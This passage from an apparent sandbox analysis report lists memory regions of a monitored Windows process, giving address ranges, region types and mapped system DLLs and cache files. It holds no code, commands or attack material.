"private_0x0000000000480000" filename = "" Region: id = 423 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 424 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 425 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 426 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 427 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 428 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 429 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 430 start_va = 0x1ad90000 end_va = 0x1ae8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad90000" filename = "" Region: id = 431 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 432 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 433 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 434 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 435 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 436 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 437 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 438 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 439 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 440 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 441 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 442 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 443 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 444 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 445 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 446 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 447 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 448 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 449 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 450 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 451 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 452 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 453 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 454 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 455 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 456 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 457 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 458 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 459 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 460 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 461 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 462 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 463 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 464 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 465 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 466 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 467 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 468 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 469 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 470 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 471 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 472 start_va = 0x1b080000 end_va = 0x1b17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b080000" filename = "" Region: id = 473 start_va = 0x7ffffefe000 end_va = 0x7ffffefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffefe000" filename = "" Region: id = 474 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 475 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 476 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 477 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 478 start_va = 0x1b1d0000 end_va = 0x1b2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b1d0000" filename = "" Region: id = 479 start_va = 0x7feef960000 end_va = 0x7fef05cefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\e43dd9c73ab5615e461bf5109c3facd6\\system.ni.dll") Region: id = 480 start_va = 0x7ffffefc000 end_va = 0x7ffffefdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffefc000" filename = "" Region: id = 481 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 482 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 483 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 484 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 485 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 486 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 487 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 488 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 489 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 490 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 491 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 492 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 493 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 494 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 495 start_va = 0x2090000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 496 start_va = 0x21c0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 497 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 498 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 499 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 500 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 501 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 502 start_va = 0x2200000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 503 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 504 start_va = 0x2240000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 505 start_va = 0x2250000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 506 start_va = 0x2260000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 507 start_va = 0x22f0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 508 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 509 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 510 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 511 start_va = 0x1a7b0000 end_va = 0x1a7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7b0000" filename = "" Region: id = 512 start_va = 0x1a7c0000 end_va = 0x1a7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7c0000" filename = "" Region: id = 513 start_va = 0x1a7d0000 end_va = 0x1a7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7d0000" filename = "" Region: id = 514 start_va = 0x1a7e0000 end_va = 0x1a7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7e0000" filename = "" Region: id = 515 start_va = 0x1a7f0000 end_va = 0x1a7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7f0000" filename = "" Region: id = 516 start_va = 0x1a900000 end_va = 0x1a90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a900000" filename = "" Region: id = 517 start_va = 0x1ace0000 end_va = 0x1aceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ace0000" filename = "" Region: id = 518 start_va = 0x1acf0000 end_va = 0x1acfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001acf0000" filename = "" Region: id = 519 start_va = 0x1ad00000 end_va = 0x1ad0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad00000" filename = "" Region: id = 520 start_va = 0x1ad10000 end_va = 0x1ad1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad10000" filename = "" Region: id = 521 start_va = 0x1ad20000 end_va = 0x1ad2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad20000" filename = "" Region: id = 522 start_va = 0x1ad30000 end_va = 0x1ad3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad30000" filename = "" Region: id = 523 start_va = 0x1ad40000 end_va = 0x1ad4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad40000" filename = "" Region: id = 524 start_va = 0x1ad50000 end_va = 0x1ad5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad50000" filename = "" Region: id = 525 start_va = 0x1ad60000 end_va = 0x1ad6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad60000" filename = "" Region: id = 526 start_va = 0x1ad70000 end_va = 0x1ad7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad70000" filename = "" Region: id = 527 start_va = 0x1ad80000 end_va = 0x1ad8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad80000" filename = "" Region: id = 528 start_va = 0x1ae90000 end_va = 0x1ae9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae90000" filename = "" Region: id = 529 start_va = 0x1aea0000 end_va = 0x1aeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aea0000" filename = "" Region: id = 530 start_va = 0x1aeb0000 end_va = 0x1aebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aeb0000" filename = "" Region: id = 531 start_va = 0x1aec0000 end_va = 0x1aecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aec0000" filename = "" Region: id = 532 start_va = 0x1aed0000 end_va = 0x1aedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aed0000" filename = "" Region: id = 533 start_va = 0x1aee0000 end_va = 0x1aeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aee0000" filename = "" Region: id = 534 start_va = 0x1aef0000 end_va = 0x1aefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aef0000" filename = "" Region: id = 535 start_va = 0x1af00000 end_va = 0x1af0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af00000" filename = "" Region: id = 536 start_va = 0x1af10000 end_va = 0x1af1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af10000" filename = "" Region: id = 537 start_va = 0x1af20000 end_va = 0x1af2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af20000" filename = "" Region: id = 538 start_va = 0x1af30000 end_va = 0x1af3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af30000" filename = "" Region: id = 539 start_va = 0x1af40000 end_va = 0x1af4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af40000" filename = "" Region: id = 540 start_va = 0x1af50000 end_va = 0x1af5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af50000" filename = "" Region: id = 541 start_va = 0x1af60000 end_va = 0x1af6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af60000" filename = "" Region: id = 542 start_va = 0x1af70000 end_va = 0x1af7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af70000" filename = "" Region: id = 543 start_va = 0x7fe92720000 end_va = 0x7fe9272ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fe92720000" filename = "" Region: id = 544 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 545 start_va = 0x7fefd640000 end_va = 0x7fefd664fff monitored = 0 entry_point = 0x7fefd649658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 546 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 547 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 548 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 549 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 550 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 551 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 552 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 553 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 554 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 555 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 556 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 557 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 558 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 559 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 560 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 561 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 562 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 563 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 564 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 565 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 566 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 567 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 568 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 569 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 570 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 571 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 572 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 573 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 574 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 575 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 576 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 577 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 578 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 579 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 580 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 581 start_va = 0x779f0000 end_va = 0x779f6fff monitored = 0 entry_point = 0x779f106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 582 start_va = 0x1ae90000 end_va = 0x1af4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 583 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 584 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 585 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 586 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 587 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 588 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 589 start_va = 0x7fefe070000 end_va = 0x7fefedf7fff monitored = 0 entry_point = 0x7fefe0ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 590 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 591 start_va = 0x7fef75e0000 end_va = 0x7fef75f5fff monitored = 1 entry_point = 0x7fef75ee5e0 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\nlssorting.dll") Region: id = 592 start_va = 0x1b2d0000 end_va = 0x1b5a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\sortdefault.nlp") Region: id = 593 start_va = 0x1af80000 end_va = 0x1b07ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af80000" filename = "" Region: id = 594 start_va = 0x7ffffefa000 end_va = 0x7ffffefbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffefa000" filename = "" Region: id = 595 start_va = 0x7fefc0d0000 end_va = 0x7fefc125fff monitored = 0 entry_point = 0x7fefc0dbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 596 start_va = 0x1b5b0000 end_va = 0x1b6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b5b0000" filename = "" Region: id = 597 start_va = 0x1b6d0000 end_va = 0x1b7aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001b6d0000" filename = "" Region: id = 598 start_va = 0x7fefc130000 end_va = 0x7fefc25bfff monitored = 0 entry_point = 0x7fefc1394bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 599 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 600 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 601 start_va = 0x7fefc2b0000 end_va = 0x7fefc4a3fff monitored = 0 entry_point = 0x7fefc43c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 602 start_va = 0x480000 end_va = 0x480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 603 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 604 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 605 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 606 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 607 start_va = 0x7fefb800000 end_va = 0x7fefb82cfff monitored = 0 entry_point = 0x7fefb801010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 608 start_va = 0x7feffae0000 end_va = 0x7feffb31fff monitored = 0 entry_point = 0x7feffae10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 609 start_va = 0x4b0000 end_va = 0x4b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 610 start_va = 0x540000 end_va = 0x55dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000c.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" (normalized: 